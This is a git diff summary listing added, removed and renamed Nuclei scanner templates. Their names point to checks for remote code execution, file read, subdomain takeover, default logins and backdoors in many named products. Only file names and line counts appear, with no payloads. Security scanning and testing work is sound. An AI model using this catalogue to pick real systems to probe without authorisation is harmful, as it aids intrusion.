.../Other/glpi_CVE-2022-35914.yaml | 48 + .../Other/gnuboard-detect-7742.yaml | 31 + nuclei-templates/Other/gnuboard-detect.yaml | 35 - ...7745.yaml => go-anywhere-client-7743.yaml} | 0 .../Other/gocd-cruise-configuration-7746.yaml | 27 + .../Other/gocd-cruise-configuration-7748.yaml | 27 - .../Other/gogs-install-exposure-7755.yaml | 4 - nuclei-templates/Other/gogs-login-7759.yaml | 20 - nuclei-templates/Other/gogs-login.yaml | 25 + nuclei-templates/Other/goip-1-lfi-7762.yaml | 23 + nuclei-templates/Other/goip-1-lfi-7764.yaml | 20 - ...oogle-api-7772.yaml => google-api(1).yaml} | 0 .../Other/google-api-key-7768.yaml | 19 - nuclei-templates/Other/google-api-key.yaml | 16 + ...ed-7787.yaml => google-floc-disabled.yaml} | 0 nuclei-templates/Other/google-secrets.yaml | 35 + .../Other/google-storage-7789.yaml | 18 + nuclei-templates/Other/google-storage.yaml | 17 - .../Other/google-textsearchplaces.yaml | 17 - .../Other/googlet-extsearchplaces.yaml | 25 + ...3.yaml => gophish-default-login-7792.yaml} | 0 .../gradio-CVE-2024-1728.yaml} | 0 ...yaml => gradle-enterprise-panel-7799.yaml} | 0 .../Other/grafana-default-login-7803.yaml | 19 +- nuclei-templates/Other/grafana-detect.yaml | 7 - .../Other/grafana-file-read-7811.yaml | 33 - nuclei-templates/Other/grafana-file-read.yaml | 27 + .../Other/grafana-public-signup-7817.yaml | 5 - .../grails-database-admin-console-7819.yaml | 22 + .../grails-database-admin-console-7820.yaml | 26 - .../Other/graphql-detect-7832.yaml | 151 + nuclei-templates/Other/graphql-detect.yaml | 158 - .../Other/graphql-field-suggestion-7834.yaml | 37 + .../Other/graphql-field-suggestion.yaml | 33 - .../Other/graphql-get-method-7836.yaml | 43 - .../Other/graphql-get-method.yaml | 34 + .../Other/grav-cms-detect-7842.yaml | 3 +- ...ser.yaml => graylog-api-browser-7846.yaml} | 0 .../Other/groovy-console-open.yaml | 33 + ...ice-lfi-7851.yaml => groupoffice-lfi.yaml} | 0 .../Other/gruntfile-exposure-7852.yaml | 26 + .../Other/gruntfile-exposure.yaml | 29 - nuclei-templates/Other/gsoap-lfl(1).yaml | 28 + ...900-login.yaml => gt-ac2900-login(1).yaml} | 0 ...ct-7862.yaml => gunicorn-detect-7864.yaml} | 0 .../Other/h2console-panel-7866.yaml | 21 - nuclei-templates/Other/h2console-panel.yaml | 20 + ...\350\256\241\347\263\273\347\273\237.yaml" | 20 + nuclei-templates/Other/h3c-imc-rce-7870.yaml | 40 - nuclei-templates/Other/h3c-imc-rce-7871.yaml | 35 + ...xposure-7874.yaml => hadoop-exposure.yaml} | 0 .../Other/hadoop-unauth-7875.yaml | 25 - .../Other/hadoop-unauth-7878.yaml | 21 + ...hanming-lfr.yaml => hanming-lfr-7880.yaml} | 0 ...ect-7881.yaml => hanwang-detect-7882.yaml} | 0 ...or-detect-7886.yaml => harbor-detect.yaml} | 0 .../Other/hashicorp-consul-rce-7890.yaml | 29 - .../Other/hashicorp-consul-rce-7891.yaml | 37 + .../Other/hashicorp-consul-webgui-7897.yaml | 37 + .../Other/hashicorp-consul-webgui.yaml | 37 - .../Other/hasura-graphql-psql-exec-7901.yaml | 39 + .../Other/hasura-graphql-psql-exec.yaml | 35 - .../Other/hatenablog-takeover-7909.yaml | 8 +- nuclei-templates/Other/hb-audio-lfi-7911.yaml | 32 + nuclei-templates/Other/hb-audio-lfi-7912.yaml | 29 - .../Other/header-command-injection-7917.yaml | 22 +- ...njection.yaml => header-injection(1).yaml} | 0 .../Other/header_blind_xss-7914.yaml | 17 - .../Other/header_blind_xss-7915.yaml | 17 + .../Other/heatmiser-wifi-thermostat-7924.yaml | 10 +- .../Other/helpjuice-takeover-7925.yaml | 15 + .../Other/helpjuice-takeover.yaml | 15 - .../Other/helpscout-takeover-7935.yaml | 16 - .../Other/helpscout-takeover.yaml | 19 + ...er-7941.yaml => heroku-takeover-7944.yaml} | 0 .../Other/herokuapp-detect-7937.yaml | 35 +- .../Other/hide-security-enhancer-lfi.yaml | 6 +- .../Other/hikvision-detection-7954.yaml | 23 + .../Other/hikvision-detection.yaml | 21 - ...959.yaml => hitron-technologies-7961.yaml} | 0 .../hjtcloud-arbitrary-file-read-7967.yaml | 33 - .../hjtcloud-arbitrary-file-read-7968.yaml | 39 + ...jtcloud-rest-arbitrary-file-read-7973.yaml | 36 - ...jtcloud-rest-arbitrary-file-read-7976.yaml | 35 + ...-panel-7978.yaml => hmc-hybris-panel.yaml} | 0 ... homeautomation-v3-openredirect-7986.yaml} | 0 .../honeywell-building-control-7987.yaml | 4 - .../Other/honeywell-scada-config-7992.yaml | 25 - .../Other/honeywell-scada-config.yaml | 25 + ...aml => honeywell-web-controller-7993.yaml} | 0 .../Other/hongdian-default-login-7997.yaml | 50 - .../Other/hongdian-default-login.yaml | 51 + .../Other/host-header-injection-8000.yaml | 2 +- nuclei-templates/Other/host_poisening.yaml | 88 - .../Other/hostheaderpoisoning.yaml | 62 + .../Other/hp-blade-admin-detect-8005.yaml | 24 - .../Other/hp-blade-admin-detect.yaml | 24 + ...8.yaml => hp-device-info-detect-8010.yaml} | 0 nuclei-templates/Other/hp-ilo-5-8021.yaml | 33 - nuclei-templates/Other/hp-ilo-5.yaml | 32 + .../Other/hp-ilo-serial-key-disclosure.yaml | 7 +- .../Other/hp-laserjet-detect-8027.yaml | 22 + .../Other/hp-laserjet-detect-8028.yaml | 23 - ...t.yaml => hp-media-vault-detect-8031.yaml} | 0 ...8034.yaml => hp-service-manager-8033.yaml} | 0 .../Other/hp-switch-default-login-8035.yaml | 42 - .../Other/hp-switch-default-login-8038.yaml | 29 + .../hpe-system-management-login-8014.yaml | 27 + .../hpe-system-management-login-8017.yaml | 27 - ...0.yaml => hrsale-unauthenticated-lfi.yaml} | 0 ...sort-fileRead.yaml => hsort-fileread.yaml} | 0 .../{hst-fileRead.yaml => hst-fileread.yaml} | 0 .../Other/htaccess-config-8042.yaml | 18 - nuclei-templates/Other/htaccess-config.yaml | 25 + .../Other/htpasswd-detection-8046.yaml | 25 + .../Other/htpasswd-detection.yaml | 25 - ...cd-unauthenticated-api-data-leak-8056.yaml | 30 + ...tp-etcd-unauthenticated-api-data-leak.yaml | 30 - .../{http-raw.yaml => http-raw-multiple.yaml} | 0 .../Other/httpbin-open-redirect-8047.yaml | 23 + .../Other/httpbin-open-redirect.yaml | 28 - ...aml => huatian-oa-upload-file-upload.yaml} | 0 .../Other/huawei-HG532e-default-login.yaml | 38 + .../Other/huawei-hg255s-lfi-8060.yaml | 23 - .../Other/huawei-hg255s-lfi-8061.yaml | 27 + ...awei-hg532e-default-router-login-8062.yaml | 37 - ...59-lfi.yaml => huawei-hg659-lfi-8067.yaml} | 0 .../Other/huawei-home-gateway-8072.yaml | 20 - .../Other/huawei-home-gateway.yaml | 24 + .../Other/huawei-router-auth-bypass-8075.yaml | 6 +- ...Read.yaml => huayu-reporter-fileread.yaml} | 0 .../Other/hubspot-takeover-8079.yaml | 17 + nuclei-templates/Other/hubspot-takeover.yaml | 17 - nuclei-templates/Other/hubspot.yaml | 31 - .../Other/hue-default-credential-8081.yaml | 16 +- .../Other/huijietong-cloud-fileread-8082.yaml | 33 - .../Other/huijietong-cloud-fileread-8087.yaml | 19 + ... ibm-advanced-system-management-8088.yaml} | 0 .../ibm-friendly-path-exposure-8092.yaml | 37 - .../Other/ibm-friendly-path-exposure.yaml | 32 + .../Other/ibm-infoprint-lfi-8101.yaml | 22 + nuclei-templates/Other/ibm-infoprint-lfi.yaml | 21 - .../ibm-mqseries-default-login-8106.yaml | 50 + .../Other/ibm-mqseries-default-login.yaml | 39 - ...gin-8111.yaml => ibm-note-login-8110.yaml} | 0 ....yaml => ibm-security-access-manager.yaml} | 0 ...ect.yaml => ibm-sterling-detect-8122.yaml} | 0 .../ibm-storage-default-credential-8124.yaml | 42 - .../Other/ibm-storage-default-credential.yaml | 46 + .../Other/ibm-websphere-ssrf-8126.yaml | 23 + .../Other/ibm-websphere-ssrf.yaml | 24 - .../Other/icewarp-webclient-rce-8133.yaml | 29 + .../Other/icewarp-webclient-rce.yaml | 31 - nuclei-templates/Other/icinga-web-login.yaml | 7 +- nuclei-templates/Other/id-q-xss.yaml | 42 + nuclei-templates/Other/id-xss.yaml | 46 - ...l => idemia-biometrics-default-login.yaml} | 0 .../Other/identity-services-engine-8147.yaml | 21 + .../Other/identity-services-engine.yaml | 21 - .../Other/idor-vuln-params(1).yaml | 16 + nuclei-templates/Other/idor-vuln-params.yaml | 16 - ...l => iis-internal-ip-disclosure-8149.yaml} | 0 ...-detect-8154.yaml => ilo-detect-8156.yaml} | 0 ...-detect.yaml => influxdb-detect-8160.yaml} | 0 ...spur-clusterengine-default-login-8162.yaml | 42 + .../inspur-clusterengine-default-login.yaml | 39 - ...\345\212\241\347\263\273\347\273\237.yaml" | 20 + .../Other/intercom-takeover-8166.yaml | 17 - nuclei-templates/Other/intercom-takeover.yaml | 17 + .../Other/interlib-fileread-8170.yaml | 23 - .../Other/interlib-fileread-8171.yaml | 22 + nuclei-templates/Other/internet-service.yaml | 6 +- .../Other/iomega-emc-shared-nas-8181.yaml | 30 + .../Other/iomega-emc-shared-nas.yaml | 25 - .../Other/ioncube-loader-wizard-8184.yaml | 4 - ...e.yaml => iotawatt-app-exposure-8187.yaml} | 0 .../Other/iplanet-imap-detect-8188.yaml | 23 - .../Other/iplanet-imap-detect.yaml | 23 + ...92.yaml => iptime-default-login-8193.yaml} | 0 .../Other/issuu-panel-lfi-8199.yaml | 29 - nuclei-templates/Other/issuu-panel-lfi.yaml | 28 + nuclei-templates/Other/iterable.yaml | 24 - nuclei-templates/Other/itop-detect-8201.yaml | 24 - nuclei-templates/Other/itop-detect-8203.yaml | 19 + .../{itop-panel.yaml => itop-panel-8205.yaml} | 0 .../Other/ixcache-panel-8206.yaml | 25 + nuclei-templates/Other/ixcache-panel.yaml | 24 - .../Other/jaeger-ui-dashboard-8207.yaml | 20 + .../Other/jaeger-ui-dashboard.yaml | 24 - .../Other/jamf-log4j-jndi-rce-8212.yaml | 33 - .../Other/jamf-log4j-jndi-rce.yaml | 34 + .../{jamf-panel.yaml => jamf-panel-8216.yaml} | 0 .../Other/jaspersoft-detect-8218.yaml | 17 + .../Other/jaspersoft-detect-8219.yaml | 16 - .../Other/java-melody-exposed.yaml | 10 +- .../Other/java-rmi-detect-8228.yaml | 21 + nuclei-templates/Other/java-rmi-detect.yaml | 17 - .../Other/jazzhr-takeover-8233.yaml | 15 + .../Other/jazzhr-takeover-8234.yaml | 15 - nuclei-templates/Other/jboss-detect-8237.yaml | 25 + nuclei-templates/Other/jboss-detect.yaml | 22 - nuclei-templates/Other/jboss-status-8241.yaml | 30 + nuclei-templates/Other/jboss-status-8243.yaml | 25 - .../Other/jdbc-connection-string-8244.yaml | 18 - .../Other/jdbc-connection-string.yaml | 15 + .../Other/jeecg-boot-detect-8248.yaml | 25 + nuclei-templates/Other/jeecg-boot-detect.yaml | 21 - nuclei-templates/Other/jeewms-lfi-8253.yaml | 36 - nuclei-templates/Other/jeewms-lfi.yaml | 28 + nuclei-templates/Other/jellyfin-detect.yaml | 7 +- ...panel-8261.yaml => jenkins-api-panel.yaml} | 0 .../Other/jenkins-asyncpeople-8266.yaml | 20 + .../Other/jenkins-asyncpeople-8269.yaml | 20 - .../Other/jenkins-default-8272.yaml | 40 - .../Other/jenkins-default-8273.yaml | 43 + ...ect-8275.yaml => jenkins-detect-8276.yaml} | 0 ...ogin-8280.yaml => jenkins-login-8277.yaml} | 0 .../Other/jenkins-script-8281.yaml | 35 - .../Other/jenkins-script-8283.yaml | 25 + .../Other/jetbrains-takeover-8292.yaml | 5 +- .../Other/jetty-showcontexts-enable-8295.yaml | 24 + .../Other/jetty-showcontexts-enable.yaml | 20 - nuclei-templates/Other/jfrog-8306.yaml | 30 + nuclei-templates/Other/jfrog-login.yaml | 19 - .../jfrog-unauth-build-exposed-8299.yaml | 35 - .../Other/jfrog-unauth-build-exposed.yaml | 31 + ...7.yaml => jinfornet-jreport-lfi-8310.yaml} | 0 .../Other/jinher-oa-default-login-8311.yaml | 10 +- nuclei-templates/Other/jira-detect-8314.yaml | 29 - nuclei-templates/Other/jira-detect-8316.yaml | 25 + nuclei-templates/Other/jira-login-check.yaml | 46 + .../Other/jira-login-default.yaml | 47 - .../Other/jira-service-desk-signup-8317.yaml | 21 - .../Other/jira-service-desk-signup-8321.yaml | 23 + .../jira-unauthenticated-dashboards-8326.yaml | 27 + .../jira-unauthenticated-dashboards.yaml | 27 - ...ira-unauthenticated-installed-gadgets.yaml | 4 - ...authenticated-projectcategories-8332.yaml} | 0 ...jira-unauthenticated-user-picker-8341.yaml | 15 + .../jira-unauthenticated-user-picker.yaml | 13 - .../Other/jkstatus-manager-8344.yaml | 5 +- ...onsole-8352.yaml => jmx-console-8353.yaml} | 0 ...login.yaml => jmx-default-login-8356.yaml} | 0 nuclei-templates/Other/jolokia-8368.yaml | 20 + nuclei-templates/Other/jolokia-8369.yaml | 21 - .../Other/jolokia-info-disclosure-8358.yaml | 71 + .../Other/jolokia-info-disclosure.yaml | 73 - nuclei-templates/Other/jolokia-list-8360.yaml | 27 + nuclei-templates/Other/jolokia-list.yaml | 27 - .../jolokia-unauthenticated-lfi-8366.yaml | 12 +- ...3.yaml => joomla-com-fabrik-lfi-8371.yaml} | 0 ...file.yaml => joomla-config-file-8376.yaml} | 0 .../Other/joomla-file-listing.yaml | 18 +- .../Other/joomla-htaccess-8381.yaml | 25 - .../Other/joomla-htaccess-8383.yaml | 25 + .../Other/joomla-manifest-file-8387.yaml | 25 + .../Other/joomla-manifest-file.yaml | 31 - nuclei-templates/Other/joomla-panel-8389.yaml | 18 - nuclei-templates/Other/joomla-panel-8391.yaml | 18 + nuclei-templates/Other/joomla.yaml | 173650 --------------- .../Other/jsf-detection-8398.yaml | 36 + nuclei-templates/Other/jsf-detection.yaml | 31 - .../Other/jupyter-ipython-unauth-8405.yaml | 30 + .../Other/jupyter-ipython-unauth.yaml | 21 - .../Other/jupyter-notebook-8407.yaml | 34 + nuclei-templates/Other/jupyter-notebook.yaml | 27 - .../Other/jupyterhub-default-login-8399.yaml | 14 +- nuclei-templates/Other/jwt-token-8408.yaml | 18 + nuclei-templates/Other/jwt-token-8410.yaml | 15 - nuclei-templates/Other/kafdrop-xss-8411.yaml | 4 - .../kafka-center-default-login-8415.yaml | 47 + .../Other/kafka-center-default-login.yaml | 42 - .../Other/kafka-center-login-8418.yaml | 3 - ...ect-ui.yaml => kafka-connect-ui-8420.yaml} | 0 ...-8425.yaml => kafka-consumer-monitor.yaml} | 0 .../Other/kafka-cruise-control-8427.yaml | 21 + .../Other/kafka-cruise-control.yaml | 18 - ...ui-8432.yaml => kafka-topics-ui-8434.yaml} | 0 ...8442.yaml => keenetic-web-login-8443.yaml} | 0 .../Other/kenesto-login-8445.yaml | 22 + nuclei-templates/Other/kenesto-login.yaml | 26 - ...ogin-8446.yaml => kentico-login-8447.yaml} | 0 .../Other/keo-klr300n-install.yaml | 39 + ...50.yaml => kerio-connect-client-8452.yaml} | 0 .../Other/kevinlab-bems-backdoor-8453.yaml | 40 - .../Other/kevinlab-bems-backdoor-8456.yaml | 33 + ...sqli.yaml => kevinlab-bems-sqli-8459.yaml} | 0 .../Other/kevinlab-hems-backdoor-8466.yaml | 41 - .../Other/kevinlab-hems-backdoor.yaml | 35 + .../Other/key-cloak-admin-panel-8468.yaml | 24 + .../Other/key-cloak-admin-panel-8470.yaml | 18 - .../Other/keycloak-json-8472.yaml | 25 - nuclei-templates/Other/keycloak-json.yaml | 21 + .../Other/keycloak-openid-config-8475.yaml | 30 + .../Other/keycloak-openid-config.yaml | 25 - nuclei-templates/Other/keycloak-xss-8478.yaml | 28 + nuclei-templates/Other/keycloak-xss-8481.yaml | 23 - ...na-detect-8484.yaml => kibana-detect.yaml} | 0 ...bana-panel.yaml => kibana-panel-8485.yaml} | 0 nuclei-templates/Other/kingdee-eas.yaml | 27 + .../kingdee\344\272\247\345\223\201.yaml" | 32 + ...login.yaml => kingsoft-default-login.yaml} | 0 ...gsoft-upload.yaml => kingsoft-upload.yaml} | 0 .../Other/kingsoft-v8-file-read-8491.yaml | 27 + .../Other/kingsoft-v8-file-read.yaml | 34 - .../Other/kinsta-takeover-8493.yaml | 19 + .../Other/kinsta-takeover-8494.yaml | 18 - nuclei-templates/Other/kiwitcms-login.yaml | 5 +- nuclei-templates/Other/klr300n-installer.yaml | 36 - nuclei-templates/Other/kong-detect-8500.yaml | 24 +- ...lt-login.yaml => konga-default-login.yaml} | 0 ...ts-8503.yaml => kube-api-deployments.yaml} | 0 .../Other/kube-api-namespaces-8506.yaml | 6 +- nuclei-templates/Other/kube-api-nodes.yaml | 13 +- .../Other/kube-api-pods-8509.yaml | 26 - nuclei-templates/Other/kube-api-pods.yaml | 22 + .../Other/kube-api-secrets-8511.yaml | 26 + nuclei-templates/Other/kube-api-secrets.yaml | 22 - .../Other/kube-api-services-8513.yaml | 26 - .../Other/kube-api-services-8514.yaml | 22 + .../Other/kubeflow-dashboard-unauth-8515.yaml | 27 + .../Other/kubeflow-dashboard-unauth.yaml | 26 - .../Other/kubelet-metrics-8521.yaml | 7 +- ...belet-pods-8522.yaml => kubelet-pods.yaml} | 0 .../Other/kubelet-runningpods-8525.yaml | 22 - nuclei-templates/Other/kubelet-scan.yaml | 26 + ... kubernetes-kustomization-disclosure.yaml} | 0 .../Other/kubernetes-metrics-8536.yaml | 7 +- .../Other/kubernetes-mirantis-8541.yaml | 21 + .../Other/kubernetes-mirantis.yaml | 27 - ...ods-api.yaml => kubernetes-pods-8546.yaml} | 0 ...tes-unauth.yaml => kubernetes-unauth.yaml} | 0 nuclei-templates/Other/kubio.yaml | 59 + .../Other/kyocera-m2035dn-lfi-8557.yaml | 28 + .../Other/kyocera-m2035dn-lfi-8559.yaml | 22 - .../Other/landingi-takeover-8566.yaml | 20 + .../Other/landingi-takeover-8567.yaml | 17 - .../Other/landray-oa-fileread-8569.yaml | 47 + .../Other/landray-oa-fileread.yaml | 41 - .../Other/landray-oa-treexml-rce.yaml | 28 - .../Other/lansweeper-login-8572.yaml | 26 + nuclei-templates/Other/lansweeper-login.yaml | 22 - .../Other/laravel-debug-enabled-8576.yaml | 19 + .../Other/laravel-debug-enabled-8577.yaml | 27 - ...el-env-8586.yaml => laravel-env-8580.yaml} | 0 .../Other/laravel-filemanager-8590.yaml | 4 + .../Other/laravel-log-file-8597.yaml | 31 + .../Other/laravel-log-file-8598.yaml | 32 - nuclei-templates/Other/laravel.yaml | 19 +- nuclei-templates/Other/lazy-file-8608.yaml | 18 + nuclei-templates/Other/lazy-file.yaml | 17 - .../Other/leostream-panel-8609.yaml | 17 +- nuclei-templates/Other/lfi-linux-fuzz.yaml | 78 + ...ess-lfr (copy 1).yaml => lfr_express.yaml} | 0 ...4.yaml => liferay-portal-detect-8626.yaml} | 0 nuclei-templates/Other/linkedin-id-11853.yaml | 25 - nuclei-templates/Other/linkedin-id.yaml | 16 + .../Other/linkerd-badrule-detect-8630.yaml | 45 + nuclei-templates/Other/linkerd-detect.yaml | 38 - .../Other/linkerd-service-detect-8634.yaml | 28 - .../Other/linkerd-service-detect.yaml | 29 + .../Other/linkerd-ssrf-detect-8637.yaml | 18 + .../Other/linkerd-ssrf-detect.yaml | 19 - nuclei-templates/Other/linux-lfi-fuzz.yaml | 98 - nuclei-templates/Other/linux-lfi-fuzzing.yaml | 51 - ...ra.yaml => liveview-axis-camera-8648.yaml} | 0 .../Other/log4j-fuzz-head-poc.yaml | 55 + nuclei-templates/Other/log4j-header.yaml | 55 - nuclei-templates/Other/log4j-rce.yaml | 48 - nuclei-templates/Other/log4jshell-detect.yaml | 36 - nuclei-templates/Other/log4jshell.yaml | 31 + nuclei-templates/Other/loqate.yaml | 2 +- .../Other/lotus-domino-version-8655.yaml | 30 + .../Other/lotus-domino-version-8656.yaml | 32 - nuclei-templates/Other/lotuscms-rce-8653.yaml | 7 +- nuclei-templates/Other/lucee-detect-8660.yaml | 4 + nuclei-templates/Other/lucee-login-8663.yaml | 21 + nuclei-templates/Other/lucee-login-8665.yaml | 25 - .../Other/lucee-stack-trace-8668.yaml | 21 + nuclei-templates/Other/lucee-stack-trace.yaml | 25 - ...luftguitar-arbitrary-file-upload-8672.yaml | 24 - .../luftguitar-arbitrary-file-upload.yaml | 23 + ...8686.yaml => maccmsv10-backdoor-8683.yaml} | 0 .../Other/magento-2-exposed-api-8688.yaml | 37 - .../Other/magento-2-exposed-api-8689.yaml | 40 + .../Other/magento-admin-panel-8692.yaml | 27 - .../Other/magento-admin-panel-8695.yaml | 21 + .../Other/magento-cacheleak-8696.yaml | 37 - .../Other/magento-cacheleak-8698.yaml | 33 + ...o-config-8702.yaml => magento-config.yaml} | 0 .../Other/magento-detect-8705.yaml | 30 + nuclei-templates/Other/magento-detect.yaml | 28 - ...ml => magento-information-disclosure.yaml} | 0 .../magento-unprotected-dev-files-8709.yaml | 31 + .../Other/magento-unprotected-dev-files.yaml | 32 - ...agicFlow-sqli.yaml => magicflow-sqli.yaml} | 0 nuclei-templates/Other/magmi-detect-8715.yaml | 5 +- .../Other/maian-cart-detect-8719.yaml | 17 + nuclei-templates/Other/maian-cart-detect.yaml | 14 - .../Other/maian-cart-preauth-rce-8721.yaml | 29 +- .../Other/mailchimp-api-11854.yaml | 16 - nuclei-templates/Other/mailchimp-api.yaml | 13 + nuclei-templates/Other/mailgun-api(1).yaml | 3 + nuclei-templates/Other/mailgun.yaml | 2 +- .../manage-engine-admanager-panel-8731.yaml | 16 - .../Other/manage-engine-admanager-panel.yaml | 14 + .../Other/manageengine-adaudit-8728.yaml | 34 - .../Other/manageengine-adaudit.yaml | 21 + ...l => manageengine-adselfservice-8736.yaml} | 0 ...-8742.yaml => manageengine-analytics.yaml} | 0 .../manageengine-apex-helpdesk-8747.yaml | 24 + .../Other/manageengine-apex-helpdesk.yaml | 19 - ...nageengine-applications-manager-8752.yaml} | 0 .../manageengine-assetexplorer-8756.yaml | 19 + .../manageengine-assetexplorer-8757.yaml | 20 - .../Other/manageengine-desktop-8763.yaml | 6 +- .../manageengine-keymanagerplus-8764.yaml | 26 - .../Other/manageengine-keymanagerplus.yaml | 25 + .../Other/manageengine-opmanager-8767.yaml | 30 + .../Other/manageengine-opmanager-8768.yaml | 26 - .../Other/manageengine-servicedesk-8771.yaml | 23 + .../Other/manageengine-servicedesk-8772.yaml | 26 - .../Other/manageengine-supportcenter.yaml | 9 +- .../Other/mantis-detect-8780.yaml | 18 - .../Other/mantis-detect-8782.yaml | 15 + .../Other/mantisbt-default-credential.yaml | 4 +- nuclei-templates/Other/mapbox.yaml | 23 - ...r-8786.yaml => mashery-takeover-8785.yaml} | 0 .../Other/{get.yaml => match-1.yaml} | 0 .../Other/mcafee-epo-rce-8793.yaml | 34 + nuclei-templates/Other/mcafee-epo-rce.yaml | 29 - ...-8796.yaml => mdb-database-file-8795.yaml} | 0 ...akeover-8798.yaml => medium-takeover.yaml} | 0 ...d-stats.yaml => memcached-stats-8800.yaml} | 0 .../Other/meshcentral-login-8801.yaml | 25 + .../Other/meshcentral-login-8803.yaml | 21 - .../Other/metadata-alibaba-8807.yaml | 39 + .../Other/metadata-alibaba-8809.yaml | 41 - nuclei-templates/Other/metadata-aws-8810.yaml | 41 + nuclei-templates/Other/metadata-aws.yaml | 42 - .../Other/metadata-azure-8813.yaml | 45 + .../Other/metadata-azure-8815.yaml | 42 - .../Other/metadata-digitalocean-8818.yaml | 39 + .../Other/metadata-digitalocean.yaml | 39 - .../Other/metadata-google-8820.yaml | 40 - nuclei-templates/Other/metadata-google.yaml | 40 + .../Other/metadata-hetzner-8822.yaml | 42 + .../Other/metadata-hetzner-8823.yaml | 42 - .../Other/metadata-openstack-8827.yaml | 43 - .../Other/metadata-openstack.yaml | 39 + .../Other/metadata-oracle-8830.yaml | 36 - .../Other/metadata-oracle-8831.yaml | 40 + nuclei-templates/Other/metatag-cms-8833.yaml | 8 +- ...microsoft-exchange-server-detect-8851.yaml | 27 - ...microsoft-exchange-server-detect-8853.yaml | 26 + ...8858.yaml => microsoft-teams-webhook.yaml} | 0 .../Other/microstrategy-ssrf-8859.yaml | 7 +- .../Other/microweber-detect-8863.yaml | 22 - nuclei-templates/Other/microweber-detect.yaml | 23 + .../Other/microweber-xss-8864.yaml | 40 - .../Other/microweber-xss-8865.yaml | 36 + .../Other/mida-eframework-xss-8869.yaml | 23 + .../Other/mida-eframework-xss.yaml | 27 - ...aph-8870.yaml => mikrotik-graph-8871.yaml} | 0 .../Other/mikrotik-routeros-8873.yaml | 22 - .../Other/mikrotik-routeros-8875.yaml | 25 + .../Other/minimouse-lfi-8877.yaml | 25 + nuclei-templates/Other/minimouse-lfi.yaml | 24 - .../Other/minio-default-login-8887.yaml | 35 - .../Other/minio-default-login.yaml | 44 + .../Other/minio-default-password-8891.yaml | 41 - .../Other/minio-default-password.yaml | 35 + ...-8898.yaml => mirai-unknown-rce-8899.yaml} | 0 .../Other/misconfigured-docker-8900.yaml | 30 + .../Other/misconfigured-docker.yaml | 26 - .../Other/mobileiron-log4j-jndi-rce-8904.yaml | 4 +- .../Other/mobotix-guest-camera-8911.yaml | 22 - .../Other/mobotix-guest-camera.yaml | 20 + .../Other/mofi4500-default-login-8913.yaml | 11 +- .../Other/moinmoin-detect-8916.yaml | 30 + .../Other/moinmoin-detect-8917.yaml | 30 - nuclei-templates/Other/mongodb-detect.yaml | 3 +- .../Other/mongodb-unauth-8928.yaml | 9 +- .../Other/monitorix-exposure-8932.yaml | 28 - .../Other/monitorix-exposure.yaml | 26 + .../Other/moodle-changelog-8935.yaml | 31 - .../Other/moodle-changelog-8936.yaml | 26 + .../Other/moodle-filter-jmol-lfi-8938.yaml | 18 - .../Other/moodle-filter-jmol-lfi-8941.yaml | 28 + .../Other/moodle-filter-jmol-xss-8944.yaml | 20 - .../Other/moodle-filter-jmol-xss-8945.yaml | 18 + nuclei-templates/Other/moodle-xss-8951.yaml | 27 - nuclei-templates/Other/moodle-xss.yaml | 28 + nuclei-templates/Other/mpsec-lfi-8954.yaml | 33 + nuclei-templates/Other/mpsec-lfi-8957.yaml | 28 - nuclei-templates/Other/mrtg-detect-8958.yaml | 27 - nuclei-templates/Other/mrtg-detect-8959.yaml | 26 + .../Other/ms-adcs-detect-8960.yaml | 52 +- ...ms-exchange-server-reflected-xss-8962.yaml | 32 - .../ms-exchange-server-reflected-xss.yaml | 27 + nuclei-templates/Other/msvod-sqli-8969.yaml | 19 + nuclei-templates/Other/msvod-sqli.yaml | 17 - .../Other/mthemeunus-lfi-8971.yaml | 14 +- .../multiples-swagger-xss-indentify.yaml | 31 - nuclei-templates/Other/multipurpose.yaml | 59 + .../Other/music-store-open-redirect-8972.yaml | 21 + .../Other/music-store-open-redirect.yaml | 21 - .../Other/mx-service-detector-8975.yaml | 69 - .../Other/mx-service-detector.yaml | 79 + ...xss-8978.yaml => my-chatbot-xss-8979.yaml} | 0 .../Other/mysql-native-password-8980.yaml | 18 + .../Other/mysql-native-password.yaml | 15 - nuclei-templates/Other/myucms-lfr-8985.yaml | 16 + nuclei-templates/Other/myucms-lfr-8987.yaml | 23 - .../Other/nagios-default-login-8990.yaml | 39 - .../Other/nagios-default-login-8991.yaml | 39 + .../Other/nagios-status-page-3.yaml | 18 + .../Other/nagios-status-page-8995.yaml | 21 - .../Other/nativechurch-wp-theme-lfd-8999.yaml | 26 + .../Other/nativechurch-wp-theme-lfd-9002.yaml | 23 - ...yaml => natshell-path-traversal-9005.yaml} | 0 nuclei-templates/Other/natshell-rce-9012.yaml | 27 + nuclei-templates/Other/natshell-rce.yaml | 22 - ...neos-detect.yaml => neos-detect-9013.yaml} | 0 nuclei-templates/Other/neos-panel-9016.yaml | 32 - nuclei-templates/Other/neos-panel.yaml | 27 + ...panel-9017.yaml => nessus-panel-9019.yaml} | 0 .../netdata-dashboard-detected-9021.yaml | 25 + .../Other/netdata-dashboard-detected.yaml | 21 - .../Other/netflix-conductor-ui-9023.yaml | 25 - .../Other/netflix-conductor-ui.yaml | 29 + .../Other/netflix-conductor-version-9024.yaml | 38 - .../Other/netflix-conductor-version.yaml | 37 + ...flow-analyzer-zoho-traffic-management.yaml | 21 + .../netgear-router-auth-bypass-9025.yaml | 34 - .../netgear-router-auth-bypass-9026.yaml | 28 + .../Other/netgear-router-exposure-9031.yaml | 20 +- nuclei-templates/Other/netis-info-leak.yaml | 3 +- nuclei-templates/Other/netis-router-9037.yaml | 25 + nuclei-templates/Other/netis-router.yaml | 24 - .../Other/netlify-takeover-9043.yaml | 20 + .../Other/netlify-takeover-9044.yaml | 21 - .../{Netoray-sqli.yaml => netoray-sqli.yaml} | 0 .../Other/{netrc-9046.yaml => netrc.yaml} | 0 .../Other/netscalar-aaa-login-9047.yaml | 2 - .../Other/netscaler-aaa-login-9050.yaml | 17 + .../Other/netscaler-aaa-login.yaml | 16 - .../Other/netscaler-gateway-9052.yaml | 14 + .../Other/netscaler-gateway-9055.yaml | 16 - .../Other/netsurveillance-web-9057.yaml | 23 - .../Other/netsurveillance-web.yaml | 22 + .../Other/netsus-default-login-9058.yaml | 9 +- ...gin-9061.yaml => netsus-server-login.yaml} | 0 .../Other/netsweeper-open-redirect-9064.yaml | 17 + .../Other/netsweeper-open-redirect.yaml | 18 - .../netsweeper-webadmin-detect-9067.yaml | 26 + .../Other/netsweeper-webadmin-detect.yaml | 24 - nuclei-templates/Other/news-flash.yaml | 59 + ...newsletter-manager-open-redirect-9075.yaml | 21 + .../newsletter-manager-open-redirect.yaml | 21 - 